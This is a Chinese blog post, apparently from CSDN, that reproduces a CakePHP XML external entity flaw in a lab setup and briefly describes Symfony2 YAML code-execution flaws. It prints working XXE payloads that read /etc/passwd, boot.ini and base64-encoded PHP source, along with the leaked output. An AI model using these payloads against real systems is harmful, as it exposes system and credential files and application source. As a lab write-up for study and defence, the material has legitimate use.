CakePHP及Symfony2 漏洞合集

最新推荐文章于 2024-06-09 09:47:47 发布
最新推荐文章于 2024-06-09 09:47:47 发布
阅读量2k 收藏
点赞数
分类专栏: 框架漏洞 文章标签: php 框架漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/119799943
版权

CakePHP 漏洞

CakePHP XML外部实体漏洞

搭建好环境,访问

http://172.16.12.2/simplexml_load_string.php

进行burp抓包,注入poc

Linux:

<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<request>
  <xxe>&payload;</xxe>
</request>

Windows:

<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
<request>
  <xxe>&payload;</xxe>

将会读取到passwd文件的内容

如果修改XML中的外部实体为其他协议,如php://filter/read=convert.base64-encode/resource=index.php,在Proxy选项卡的原数据包中粘贴XML内容,点击FORWARD放行请求,返回的结果在浏览器上显示如下

 

返回值为PD9waHANCnBocGluZm8oKTsNCj8+,经过base64解码,可以看到字符串是index.php的源代码


<?php

phpinfo();

?>

我们来访问一下index.php,可以看到确实是执行了phpinfo();函数

 Symfony2 漏洞

Symfony YAML组件多个远程PHP代码执行漏洞

Symfony是PHP Web开发框架。Symfony2 YAML Component可解析YAML字符串以转换为PHP数组,也可转换PHP数组为YAML字符串。
 
Symfony YAML组件存在多个远程PHP代码执行漏洞,攻击者可利用这些漏洞在受影响应用中执行任意PHP代码。
 

xzhome
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
laravel5.8 反序列化漏洞复现
Zero_Adam的博客
06-22 2645
1. 前言 依旧跟着feng师傅学吧, 还是再github上下载源码:laravel5.8。往composer.json的require里面加上"symfony/symfony": “4.*”,然后composer update。 如果提示 Allowed memory size of bytes exhausted,参考这篇文章:运行 composer update,提示 Allowed memory size of bytes exhausted 如果想我这里一样:就报个error。。(弄好之后没那个报
CakePHP php框架 v3.3.0 bate2
12-06
CakePHP是一个用PHP编写的开源Web应用框架,不过其模型是用Ruby on Rails设计的。作为PHP世界的Rails,...在cakephp.org站点的Sites in the wild页面可以看到当前使用CakePHP框架的网站列表。 CakePHP 是一个运用
PHP常用框架漏洞
小小猪的博客
08-14 2903
PHP常用框架漏洞 PHP框架 laraval介绍: Laravel基于MVC架构,可以满足诸如事件处理、用户身份验证等各种需求,同时通过包管理实现模块化和可扩展的代码,并且对数据库管理有着健壮的支持。 漏洞: 1. Laravel 配置文件泄露 2. Laravel <= 8.4.2 存在远程代码执行漏洞 3. Laravel 存在SQL注入漏洞 4. Laravel 反序列化漏洞 CakePHP 介绍: ...
Symfony 2 历史漏洞(选择版本的依据)
soldi_er的博客
10-21 2986
文章目录Symfony 历史漏洞百度检索CVE批量搜索CVE-看这个就行了Symfony 2 历史漏洞 Symfony 历史漏洞 百度检索CVE CVE-2021-21424: Prevent user enumeration in authentication mechanisms CVE-2020-15094 PHP模板引擎的跳脱验证讯息CVE-2019-10909、验证服务ID有效性CVE-2019-10910以及Cookie杂凑的问题CVE-2019-10911 CVE-2018-14773 CVE
探索Symfony的安全边界:symfony-exploits项目解析与应用
最新发布
gitblog_00068的博客
06-09 418
探索Symfony的安全边界:symfony-exploits项目解析与应用 项目地址:https://gitcode.com/ambionics/symfony-exploits 1、项目介绍 在软件开发的世界中,安全是不容忽视的一环,尤其是对于广泛使用的PHP框架Symfony而言。symfony-exploits 是一个专注于研究和收集针对Symfony框架潜在安全漏洞的开源项目。它为开发...
sf2-profiler-exploit:Symfony2 <2.5.4漏洞利用探查器
05-06
Symfony2 <2.5.4探查器漏洞漏洞利用了Symfony2的Web事件探查器的功能,该功能允许任何人注入和解释SQL查询。 例子: $ python sf2-profiler-sqli.py --url http://localhost/ --table example_user --columns id,username,password 上面的示例提取每个example_user表记录的id ,用户名和密码,并显示其内容。 更多信息
symfony api 错误响应_BUG赏金 | 无效的API授权导致的越权
weixin_39761422的博客
12-16 95
大家好,我想分享一下我是如何在某邀请项目中发现一个简单的API授权错误的,该错误影响了数千个子域,并允许我在无需用户干预的情况下使用大量不受保护的功能,从帐户删除到接管甚至于泄漏部分信息(姓名,电子邮件和雇主)。要点:服务器没有检查(发起请求的)授权token是属于普通用户还是超级用户。这是一个邀请项目,因此将删除一些敏感信息,我将其称为http://target.com。我在使用dirsearc...
Symfony
ylnzzl的博客
08-26 430
目录 安装 简言 实例 安装 本次安装环境是 Windows8.1操作系统 + php V7.3.12 。 安装Symfony CLI成功后,就可以通过symfony命令安装Symfony应用、启动本地网络服务器、检查依赖项的安全漏洞。 如果安装Symfony CLI不成功,这时还可以用Composer方式安装Symfony应用。 Composer方式安装Symfony简述如下。 命令行界面切换到网站目录下,然后运行: composer create-project symfony/
Drupal释新版修补jQuery与Symfony脚本漏洞
weixin_34006468的博客
04-23 156
开源内容管理框架Drupal对其Drupal 7、Drupal 8.5以及Drupal 8.6释出新建置版本,以修补JavaScript函式库jQuery和网页应用程序框架Symfony中跨站脚本***(Cross-Site Scripting,XSS)漏洞等其他问题,Drupal官方建议网站管理员立即更新。由于jQuery官方在4月中时释出新版jQuery 3.4.0,并于文件提到,之前版本存在...
CakePHP php框架 v3.6.0 beta2
11-07
CakePHP是一个用PHP编写的开源Web应用框架,不过其模型是用Ruby on Rails设计的。作为PHP世界的Rails,CakePHP采纳了RoR的许多优秀特性,成熟度较高。在cakephp.org站点的Sites in the wild页面可以看
cakephp2.X多表联合查询join及使用分页查询的方法
10-20
CakePHP 2.x框架中,进行多表联合查询(JOIN)和分页查询是数据库操作中的常见需求,尤其在处理复杂数据时显得尤为重要。以下将详细解释如何在CakePHP中实现这些功能。 首先,多表联合查询是通过JOIN语句来完成的...
Building PHP Applications with Symfony, CakePHP, and Zend Framework.pdf.rar
06-04
解压密码在:http://www.pin5i.com/showtopic-building-php-applications-with-symfony-cakephp-zend-framework.html
PHP框架高级编程——应用SymfonyCakePHP和Zend
04-24
CakePHP和Zend》一书对3种最受欢迎的开源框架进行了毫无偏见的深入比较,这3种框架SymfonyCakePHP和ZendFramework。本书详细讨论了这3种框架之间的相同点和不同点,并提供每种框架的类似示例和任务,这样读者就...
文件包含漏洞原理分析
weixin_30955341的博客
08-03 1195
文件包含这个漏洞,用我自己的话来说就是程序员在网站设计中,为方便自己在设计构架时,使用了一些包含的函数,就像'文件包含'这几个字的字面意思一样,在文件中,包含一个文件。 我在总结这篇文章的时候看了,其他人总结的,感觉别人总结的很是详细,就像一开始我只认为包含只有PHP代码中才存在,后来我再整理复习的时候,才发现,包含这个漏洞在各大语言中,都存在的,只不过现在大部分网站都是PHP网站,所以存在这个...
symfony api 异常处理_PHP RFC: 允许 __toString () 方法抛出异常
weixin_39723010的博客
12-12 126
简介当前禁止从 __toString() 中引发异常,这将导致致命错误。这使得在 __toString() 中编写任意代码都是危险的,并使其作为通用 API 的使用成为问题。这个 RFC 消除了这个限制。当前行为的基本原理是,在整个引擎和标准库的很多地方都进行了字符串转换,并且并非所有地方都准备 “正确地” 处理异常,因为从某种意义上说,应尽早处理异常。从技术的角度来看,这种限制最终是徒劳的,因为...
Symfony 常用命令汇总
刘小龙的专栏
05-10 3132
Symfony 常用命令汇总
怎么查看php是否安装了symfony_Versionscan:一款专为白帽子设计的PHP漏洞扫描报告工具
weixin_39924674的博客
11-24 228
VersionscanVersionscan是一款可以帮助安全研究人员评估PHP项目安全性的漏洞扫描及安全报告工具,它可以检测已知的CVE漏洞,并报告目标站点的潜在安全问题。目前该工具仍在适配不同的Linux发行版。 工具安装使用Composer{ "require": { "psecio/versionscan":"dev-master" }}该工具当前的依赖组件只有Symfony控制台。工具使...
CakePHP XML外部实体漏洞
小小猪的博客
11-10 1316
CakePHP XML外部实体漏洞 一、CakePHP详解: CakePHP是一个开源的PHP on rails的full-stack framework。最开始从Ruby On Rails框架里得到灵感。程序员可使用它来快速创建的Web应用程序。我们的首要目的是使你以一种预置的快速且不失灵活性的方式开展工作。 CakePHP 2.0 - 2.2.0-RC2存在XML外部实体注入漏洞,攻击者可利用此漏洞获取本地文件敏感信息。 二、CakePHP漏洞复现: 搭建好环境,访问 http://172.
cakephp的CMS教程
06-08
cakephp框架的内容,用cakephp开发了一个的简单的CMS系统教程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值